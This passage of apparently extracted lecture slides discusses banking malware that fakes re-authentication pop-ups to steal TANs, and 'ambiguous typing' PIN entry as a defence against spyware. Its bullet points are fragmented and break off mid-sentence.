changing the CC authorisationsystem Still not 100% effective •Virus reads the bank’s page from the browser cache •Pops up a window asking the user to re-authenticate due to –Users are conditioned to accept this –Too many banks use Javascript pop-ups, aggressive session •Username + TAN go to eastern Europe, user’s session European banks are switching to challenge-response calculators in response to this type of attack Ambiguous typing •Have multiple choices for each PIN digit •First digit = 1 or 5 •Second digit = 7 or 9 •Third digit = … •Attacker can only determine a possible choice of PIN digits, •ATM carries out a brute-force attack on the actual PIN value More useful with ATMs than computers •Spywarecan narrow down the choices by finding common digits over multiple PIN entries This is a social problem that can’t be fixed using •Current attempts to fix it via legislation are ineffective or